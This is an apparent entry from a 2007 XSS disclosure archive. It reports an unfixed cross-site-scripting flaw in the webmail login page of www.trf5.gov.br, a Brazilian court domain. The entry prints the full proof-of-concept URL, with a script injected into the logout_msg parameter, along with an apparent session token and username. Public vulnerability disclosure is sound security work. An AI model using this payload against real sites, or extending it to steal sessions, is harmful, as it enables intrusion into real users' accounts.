Security researcher xRoot, has submitted on 31/03/2007 a cross-site-scripting (XSS) vulnerability affecting www.trf5.gov.br, which at the time of submission ranked 134226 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 31/03/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 31/03/2007 |
Date published: 31/03/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: xRoot |
Domain: www.trf5.gov.br |
Category: XSS |
Pagerank: 134226 |
URL: http://www.trf5.gov.br/webmail2/login.php?Horde=b1b26470a959651e6ea292ef83cd936f&logout_reason=messa ge&logout_msg=<script>alert("xRoot");</script>%3B%0D%0A&url=%2Fwebmail2%2Fimp%2Flogin.php%3Fimapuser %3Dtrf5wamenezes%26amp%3BHorde%3Db1b26470a959651e6ea292ef83cd936f%26amp%3Blogout_reason%3Dmessage%26 amp%3Blogout_msg%3DBad%2Brequest%253A%2BProtocol%2BError%253A%2B%2526quot%253BExpected%2BSPACE%2Bnot %2Bfound%2526quot%253B%250D%250A |
Click here to view the mirror
|
|
|